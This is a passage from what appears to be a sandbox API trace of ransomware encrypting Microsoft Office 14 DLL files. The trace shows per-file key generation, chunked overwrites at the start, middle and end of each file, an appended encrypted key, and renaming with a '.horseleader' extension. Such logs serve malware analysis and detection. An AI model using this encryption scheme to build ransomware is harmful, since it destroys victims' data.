lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0239.482] CloseHandle (hObject=0x158) returned 1 [0239.482] GetProcessHeap () returned 0x780000 [0239.482] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0239.482] wnsprintfW (in: 
pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL.horseleader") returned 83 [0239.482] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexch.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexch.dll.horseleader")) returned 1 [0239.484] GetProcessHeap () returned 0x780000 [0239.484] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0239.484] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3706ca00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xd813d460, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3706ca00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0xdbb98, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ACEEXCL.DLL", cAlternateFileName="")) returned 1 [0239.484] lstrcmpiW (lpString1="ACEEXCL.DLL", lpString2="Windows") returned -1 [0239.484] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 71 [0239.484] StrStrIW (lpFirst="ACEEXCL.DLL", lpSrch=".horseleader") returned 0x0 [0239.484] lstrcmpW (lpString1="ACEEXCL.DLL", lpString2="#Decrypt#.txt") returned 1 [0239.484] lstrcmpW (lpString1="ACEEXCL.DLL", lpString2="_uninstalling_.png") returned 1 [0239.484] lstrlenW (lpString=".testttjffg") returned 11 [0239.484] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL", lpSrch=".testttjffg") 
returned 0x0 [0239.484] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0239.484] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0239.484] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexcl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0239.485] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 71 [0239.485] StrStrW (lpFirst="ACEEXCL.DLL", lpSrch=".txt") returned 0x0 [0239.485] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=899992) returned 1 [0239.485] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.485] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0239.548] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0239.548] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0239.548] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x6b5cc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.548] ReadFile (in: hFile=0x158, 
lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0239.592] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0239.593] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0239.593] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xd6b98, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.593] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0239.616] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0239.616] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0239.617] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.617] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0239.617] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) 
returned 1 [0239.617] CloseHandle (hObject=0x158) returned 1 [0239.617] GetProcessHeap () returned 0x780000 [0239.617] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0239.617] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL.horseleader") returned 83 [0239.618] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexcl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexcl.dll.horseleader")) returned 1 [0239.619] GetProcessHeap () returned 0x780000 [0239.619] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0239.619] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95c9c200, ftCreationTime.dwHighDateTime=0x1cba070, ftLastAccessTime.dwLowDateTime=0xd813d460, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x95c9c200, ftLastWriteTime.dwHighDateTime=0x1cba070, nFileSizeHigh=0x0, nFileSizeLow=0x53bb0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ACEODBC.DLL", cAlternateFileName="")) returned 1 [0239.619] lstrcmpiW (lpString1="ACEODBC.DLL", lpString2="Windows") returned -1 [0239.619] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 71 [0239.619] StrStrIW (lpFirst="ACEODBC.DLL", lpSrch=".horseleader") returned 0x0 [0239.619] lstrcmpW (lpString1="ACEODBC.DLL", lpString2="#Decrypt#.txt") returned 1 [0239.619] lstrcmpW (lpString1="ACEODBC.DLL", 
lpString2="_uninstalling_.png") returned 1 [0239.619] lstrlenW (lpString=".testttjffg") returned 11 [0239.619] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL", lpSrch=".testttjffg") returned 0x0 [0239.619] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0239.619] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0239.619] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodbc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0239.620] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 71 [0239.620] StrStrW (lpFirst="ACEODBC.DLL", lpSrch=".txt") returned 0x0 [0239.620] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=342960) returned 1 [0239.620] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.620] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0239.676] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0239.676] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, 
lpOverlapped=0x0) returned 1 [0239.677] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x275d8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.677] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0240.605] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0240.605] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0240.605] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x4ebb0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0240.605] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0240.901] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0240.902] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0240.902] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0240.902] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 
[0240.902] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0240.903] CloseHandle (hObject=0x158) returned 1 [0240.903] GetProcessHeap () returned 0x780000 [0240.903] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0240.903] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL.horseleader") returned 83 [0240.903] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodbc.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodbc.dll.horseleader")) returned 1 [0240.905] GetProcessHeap () returned 0x780000 [0240.906] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0240.906] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77357e00, ftCreationTime.dwHighDateTime=0x1cac9ad, ftLastAccessTime.dwLowDateTime=0x51128590, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77357e00, ftLastWriteTime.dwHighDateTime=0x1cac9ad, nFileSizeHigh=0x0, nFileSizeLow=0x3db8, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ACEODDBS.DLL", cAlternateFileName="")) returned 1 [0240.906] lstrcmpiW (lpString1="ACEODDBS.DLL", lpString2="Windows") returned -1 [0240.906] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 
72 [0240.906] StrStrIW (lpFirst="ACEODDBS.DLL", lpSrch=".horseleader") returned 0x0 [0240.906] lstrcmpW (lpString1="ACEODDBS.DLL", lpString2="#Decrypt#.txt") returned 1 [0240.906] lstrcmpW (lpString1="ACEODDBS.DLL", lpString2="_uninstalling_.png") returned 1 [0240.906] lstrlenW (lpString=".testttjffg") returned 11 [0240.906] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL", lpSrch=".testttjffg") returned 0x0 [0240.907] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0240.907] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0240.907] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoddbs.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0240.908] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 72 [0240.908] StrStrW (lpFirst="ACEODDBS.DLL", lpSrch=".txt") returned 0x0 [0240.908] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=15800) returned 1 [0240.908] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3db8, lpOverlapped=0x0) returned 1 [0241.006] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc248, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0241.006] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3db8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 
| out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3db8, lpOverlapped=0x0) returned 1 [0241.006] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0241.006] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0241.006] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0241.007] CloseHandle (hObject=0x158) returned 1 [0241.007] GetProcessHeap () returned 0x780000 [0241.007] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0241.007] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL.horseleader") returned 84 [0241.007] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoddbs.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoddbs.dll.horseleader")) returned 1 [0241.008] GetProcessHeap () returned 0x780000 [0241.008] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0241.008] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77357e00, ftCreationTime.dwHighDateTime=0x1cac9ad, ftLastAccessTime.dwLowDateTime=0x5e99f630, ftLastAccessTime.dwHighDateTime=0x1d301bf, 
ftLastWriteTime.dwLowDateTime=0x77357e00, ftLastWriteTime.dwHighDateTime=0x1cac9ad, nFileSizeHigh=0x0, nFileSizeLow=0x3db8, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ACEODEXL.DLL", cAlternateFileName="")) returned 1 [0241.008] lstrcmpiW (lpString1="ACEODEXL.DLL", lpString2="Windows") returned -1 [0241.008] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 72 [0241.008] StrStrIW (lpFirst="ACEODEXL.DLL", lpSrch=".horseleader") returned 0x0 [0241.008] lstrcmpW (lpString1="ACEODEXL.DLL", lpString2="#Decrypt#.txt") returned 1 [0241.008] lstrcmpW (lpString1="ACEODEXL.DLL", lpString2="_uninstalling_.png") returned 1 [0241.008] lstrlenW (lpString=".testttjffg") returned 11 [0241.008] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL", lpSrch=".testttjffg") returned 0x0 [0241.008] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0241.009] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0241.009] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodexl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0241.180] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 72 [0241.180] StrStrW (lpFirst="ACEODEXL.DLL", lpSrch=".txt") returned 0x0 [0241.180] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=15800) returned 1 [0241.180] ReadFile (in: hFile=0x158, 
lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3db8, lpOverlapped=0x0) returned 1 [0241.182] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc248, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0241.182] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3db8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3db8, lpOverlapped=0x0) returned 1 [0241.182] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0241.182] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0241.182] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0241.182] CloseHandle (hObject=0x158) returned 1 [0241.183] GetProcessHeap () returned 0x780000 [0241.183] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0241.183] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL.horseleader") returned 84 [0241.183] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodexl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft 
shared\\office14\\aceodexl.dll.horseleader")) returned 1 [0241.184] GetProcessHeap () returned 0x780000 [0241.184] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0241.184] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77357e00, ftCreationTime.dwHighDateTime=0x1cac9ad, ftLastAccessTime.dwLowDateTime=0x5e99f630, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77357e00, ftLastWriteTime.dwHighDateTime=0x1cac9ad, nFileSizeHigh=0x0, nFileSizeLow=0x3db8, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ACEODTXT.DLL", cAlternateFileName="")) returned 1 [0241.184] lstrcmpiW (lpString1="ACEODTXT.DLL", lpString2="Windows") returned -1 [0241.184] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 72 [0241.184] StrStrIW (lpFirst="ACEODTXT.DLL", lpSrch=".horseleader") returned 0x0 [0241.184] lstrcmpW (lpString1="ACEODTXT.DLL", lpString2="#Decrypt#.txt") returned 1 [0241.184] lstrcmpW (lpString1="ACEODTXT.DLL", lpString2="_uninstalling_.png") returned 1 [0241.184] lstrlenW (lpString=".testttjffg") returned 11 [0241.184] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL", lpSrch=".testttjffg") returned 0x0 [0241.184] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0241.184] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0241.185] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodtxt.dll"), 
